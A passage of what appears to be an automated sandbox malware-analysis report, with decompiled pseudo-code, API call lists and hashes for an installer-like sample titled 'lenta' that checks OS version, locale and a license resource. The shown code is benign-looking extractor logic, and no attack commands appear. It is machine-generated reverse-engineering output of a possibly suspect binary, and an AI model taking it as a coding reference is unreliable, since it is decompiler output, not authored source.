                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0x8d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E008D66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0x8d81d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d681f
                                                                                                                                                                                                                                            0x008d682a
                                                                                                                                                                                                                                            0x008d6831
                                                                                                                                                                                                                                            0x008d6836
                                                                                                                                                                                                                                            0x008d683c
                                                                                                                                                                                                                                            0x008d683e
                                                                                                                                                                                                                                            0x008d6848
                                                                                                                                                                                                                                            0x008d6851
                                                                                                                                                                                                                                            0x008d685d
                                                                                                                                                                                                                                            0x008d6864
                                                                                                                                                                                                                                            0x008d6876
                                                                                                                                                                                                                                            0x008d693a
                                                                                                                                                                                                                                            0x008d693a
                                                                                                                                                                                                                                            0x008d687c
                                                                                                                                                                                                                                            0x008d687e
                                                                                                                                                                                                                                            0x008d6885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d68d6
                                                                                                                                                                                                                                            0x008d68f4
                                                                                                                                                                                                                                            0x008d6900
                                                                                                                                                                                                                                            0x008d6902
                                                                                                                                                                                                                                            0x008d690a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d690c
                                                                                                                                                                                                                                            0x008d690c
                                                                                                                                                                                                                                            0x008d691c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d691e
                                                                                                                                                                                                                                            0x008d6924
                                                                                                                                                                                                                                            0x008d692b
                                                                                                                                                                                                                                            0x008d6932
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d692b
                                                                                                                                                                                                                                            0x008d691c
                                                                                                                                                                                                                                            0x008d690a
                                                                                                                                                                                                                                            0x008d6885
                                                                                                                                                                                                                                            0x008d6876
                                                                                                                                                                                                                                            0x008d6951

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008D686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 008D68A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008D68CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,?,0000000C), ref: 008D68F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008D6902
                                                                                                                                                                                                                                              • Part of subcall function 008D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,008D691A), ref: 008D6741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 008D68C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 1afa4974a342acfaa0728bb2bd01dd3a73409bf10c4fb8d5c0691365c13f5572
                                                                                                                                                                                                                                            • Instruction ID: 439f6fd484ade20deb2f9e553ac094d223fba78ded163645ee2c3c013ccc78b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1afa4974a342acfaa0728bb2bd01dd3a73409bf10c4fb8d5c0691365c13f5572
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61317F31A0121DEFDF219B61CC54BAEBB78FB45728F1403A7E949E2240EB309D958F52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D3A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E008D468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0x8d8d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E008D468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0x8d8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0x8d8d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E008D6517(_t19, 0x7d1, 0, E008D3100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0x8d8d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0x8d8d4c);
                                                                                                                                                                                                                                            					 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x008d3a46
                                                                                                                                                                                                                                            0x008d3a57
                                                                                                                                                                                                                                            0x008d3a5d
                                                                                                                                                                                                                                            0x008d3a63
                                                                                                                                                                                                                                            0x008d3a6a
                                                                                                                                                                                                                                            0x008d3a91
                                                                                                                                                                                                                                            0x008d3a9a
                                                                                                                                                                                                                                            0x008d3ad8
                                                                                                                                                                                                                                            0x008d3b13
                                                                                                                                                                                                                                            0x008d3b19
                                                                                                                                                                                                                                            0x008d3b1b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3b21
                                                                                                                                                                                                                                            0x008d3ae7
                                                                                                                                                                                                                                            0x008d3af4
                                                                                                                                                                                                                                            0x008d3afc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3afe
                                                                                                                                                                                                                                            0x008d3a87
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3a87
                                                                                                                                                                                                                                            0x008d3aa8
                                                                                                                                                                                                                                            0x008d3ab3
                                                                                                                                                                                                                                            0x008d3ab9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3ab9
                                                                                                                                                                                                                                            0x008d3a78
                                                                                                                                                                                                                                            0x008d3a82
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008D2F64,?,00000002,00000000), ref: 008D3A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 008D3AB3
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 008D3AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 008D3B13
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FindResourceA.KERNEL32(008D0000,000007D6,00000005), ref: 008D652A
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: LoadResource.KERNEL32(008D0000,00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008D6538
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: DialogBoxIndirectParamA.USER32(008D0000,00000000,00000547,008D19E0,00000000), ref: 008D6557
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FreeResource.KERNEL32(00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008D6560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,008D3100,00000000,00000000), ref: 008D3AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: d998c8c39619d925b76a27f36c084880d2e0f848403b429e69d973669c46f9b3
                                                                                                                                                                                                                                            • Instruction ID: a7c94da7c124a9e5eaddd07987d07b1268825f4252378c2f4ddc74ca0f110d09
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d998c8c39619d925b76a27f36c084880d2e0f848403b429e69d973669c46f9b3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1511DA30342211FBDB24AF36AC09E173BBAFBD5710B10432FB542D63E0EA798C008626
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D24E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E008D658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x008d24e0
                                                                                                                                                                                                                                            0x008d24eb
                                                                                                                                                                                                                                            0x008d24f2
                                                                                                                                                                                                                                            0x008d24f7
                                                                                                                                                                                                                                            0x008d2504
                                                                                                                                                                                                                                            0x008d250e
                                                                                                                                                                                                                                            0x008d251d
                                                                                                                                                                                                                                            0x008d252c
                                                                                                                                                                                                                                            0x008d2541
                                                                                                                                                                                                                                            0x008d2546
                                                                                                                                                                                                                                            0x008d2553
                                                                                                                                                                                                                                            0x008d2555
                                                                                                                                                                                                                                            0x008d2555
                                                                                                                                                                                                                                            0x008d2546
                                                                                                                                                                                                                                            0x008d256c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 008D2506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 008D252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 008D253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 008D254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 008D2555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: e0ba4e883494cd07e285733102653503e494051140fa72c4e612e62aca28460d
                                                                                                                                                                                                                                            • Instruction ID: c1481c37af40914e1fbf9d3a4eac5eaad3b24bc9d42896bfcd089f84892fd406
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0ba4e883494cd07e285733102653503e494051140fa72c4e612e62aca28460d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF019232601518A7C720DB699C0CEDB7B7CFB45760F100256FA49D3290DA748E458AA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E008D36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0x8d8184 = 1;
                                                                                                                                                                                                                                            						 *0x8d8180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0x8d9a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0x8d8a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E008D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E008D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x8d8a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0x8d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("lenta");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E008D681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E008D67C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E008D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
